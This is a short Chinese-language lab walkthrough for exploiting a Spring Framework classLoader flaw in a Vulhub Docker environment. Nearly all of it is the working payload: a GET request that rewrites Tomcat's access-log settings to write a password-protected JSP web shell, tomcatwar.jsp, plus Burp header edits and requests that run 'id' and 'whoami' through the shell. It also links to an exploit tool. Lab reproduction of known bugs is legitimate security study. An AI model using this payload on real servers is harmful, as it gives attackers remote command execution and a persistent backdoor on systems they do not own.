参考Vulhub链接:Vulhub - Docker-Compose file for vulnerability environment
正常启用vulhub环境
手工:
访问:http://192.168.29.130:8080/
构造payload:发送GET请求:
http://192.168.29.130:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
burp抓包修改替换下面标红位置:
修改后发送请求:
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2
访问:http://192.168.29.130:8080//tomcatwar.jsp?pwd=j&cmd=id
工具版:
工具链接:百度网盘 请输入提取码
访问:http://192.168.29.130:8080/tomcatwar.jsp?pwd=j&cmd=whoami